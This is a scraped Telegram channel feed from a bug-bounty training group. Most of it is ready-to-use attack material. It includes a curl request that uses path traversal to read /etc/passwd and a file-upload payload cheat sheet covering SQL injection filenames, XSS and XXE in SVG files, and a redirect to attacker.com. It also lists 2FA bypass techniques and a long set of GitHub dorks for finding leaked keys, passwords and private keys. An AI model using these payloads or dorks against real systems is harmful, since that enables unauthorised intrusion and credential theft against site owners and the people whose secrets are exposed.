Brut Security – Telegram
Brut Security
14.7K subscribers
911 photos
73 videos
287 files
967 links
Queries: @wtf_brut
🛃WhatsApp: wa.link/brutsecurity
🈴Training: brutsec.com
📨E-mail: info@brutsec.com
Download Telegram
Keep checking my old Posts to continue your learning Process!
👍9🔥31
💥Join Our Bugbounty Discussion Group 💥
🔥https://news.1rj.ru/str/brutsec🔥
🤖https://discord.gg/GZBsQMY6🤖
Please open Telegram to view this post
VIEW IN TELEGRAM
🚨 🚨 🚨 Too many people miss critical vulnerabilities because they assume a GET request can't have a body! 🚨 🚨 🚨


This is how you can send such a request using #curl :

$ curl 'target:1234/download?filename=TEST' --data 'filename=../../../../../../../etc/passwd' -X GET
👍9🔥43🥰1
S3 Bucket Recon Method
👍17🔥2
JWT_Hacking.pdf
226.3 KB
🔥4
Attacking_AWS.pdf
1.6 MB
🔥4
Now you can detect phishing websites quickly with Nuclei

nuclei -l websites_Possible_Phishing -tags phishing -itags phishing
Please open Telegram to view this post
VIEW IN TELEGRAM
3🔥3👍1
🔥8
🖥Chaining Vulnerabilities through File Upload🖥

SLQi
'sleep(20).jpg
sleep(25)-- -.jpg


Path traversal
../../etc/passwd/logo.png
../../../logo.png


XSS
->  Set file name filename="noscript onload=alert(document.domain)>" , filename="58832_300x300.jpg<noscript onload=confirm()>"

-> Upload using .gif file
GIF89a/<noscript/onload=alert(1)>/=alert(document.domain)//;

-> Upload using .noscript file
<noscript xmlns="w3.org/2000/noscript" onload="alert(1)"/>

-> <?xml version="1.0" standalone="no"?>
<!DOCTYPE noscript PUBLIC "-//W3C//DTD SVG 1.1//EN" "w3.org/Graphics/SVG/1…"><noscript version="1.1" baseProfile="full" xmlns="w3.org/2000/noscript">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<noscript type="text/javanoscript">
alert("HolyBugx XSS");
</noscript>
</noscript>


Open redirect
<code>
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<noscript
onload="window.location='attacker.com'"
xmlns="w3.org/2000/noscript">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
</noscript>
</code>

XXE
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
<noscript width="500px" height="500px" xmlns="w3.org/2000/noscript" xmlns:xlink="w3.org/1999/xlink" version="1.1
<text font-size="40" x="0" y="16">&xxe;</text>
</noscript>
Please open Telegram to view this post
VIEW IN TELEGRAM
13👍6🔥1
Blind SQL Injection Detection and Exploitation (Cheat Sheet)
👎4🔥2😁1
1711031051425.jpg
1.4 MB
🔥41
2FA Bypass Techniques

1. Response manipulation
2. Status code manipulation
3. 2FA code reusability
4. 2FA code leakage
5. Lack of brute-force protection
6. Bypassing 2FA with null or 000000
8. Missing 2FA code integrity validation
9.Handling of Previous Sessions
🔥12👍5
SQL injection Oneliner
🔥12👍4
🔥🔥Github-Dork🚀🚀🔥🔥

Happy Hunting

🔍 api_key
🔍 app_AWS_SECRET_ACCESS_KEY
🔍 app_secret
🔍 authoriztion
🔍 Ldap
🔍 aws_access_key_id
🔍 secret
🔍 bash_history
🔍 bashrc%20password
🔍 beanstalkd
🔍 client secre
🔍 composer
🔍 config
🔍 credentials
🔍 DB_PASSWORD
🔍 dotfiles
🔍 .env file
🔍 .exs file
🔍 extension:json mongolab.com
🔍 extension:pem%20private
🔍 extension:ppk private
🔍 extension:sql mysql dump
🔍 extension:yaml mongolab.com
🔍 .mlab.com password
🔍 mysql
🔍 npmrc%20_auth
🔍 passwd
🔍 passkey
🔍 rds.amazonaws.com password
🔍 s3cfg
🔍 send_key
🔍 token
🔍 filename:.bash_history
🔍 filename:.bash_profile aws
🔍 filename:.bashrc mailchimp
🔍 filename:CCCam.cfg
🔍 filename:config irc_pass
🔍 filename:config.php dbpasswd
🔍 filename:config.json auths
🔍 filename:config.php pass
🔍 filename:config.php dbpasswd
🔍 filename:connections.xml
🔍 filename:.cshrc
🔍 filename:.git-credentials
🔍 filename:.ftpconfig
🔍 filename:.history
🔍 filename:gitlab-recovery-codes.txt
🔍 filename:.htpasswd
🔍 filename:id_rsa
🔍 filename:.netrc password
🔍 FTP
🔍 filename:wp-config.php
🔍 git-credentials
🔍 github_token
🔍 HEROKU_API_KEY language:json
🔍 HEROKU_API_KEY language:shell
🔍 GITHUB_API_TOKEN language:shell
🔍 oauth
🔍 OTP
🔍 databases password
🔍 [WFClient] Password= extension:ica
🔍 xoxa_Jenkins
🔍 security_credentials

#bugbountytips #GitHub
🔥6👍4
🔥5👍1
SQL Injection Auth Bypass
🔥6👍4🥰1👏1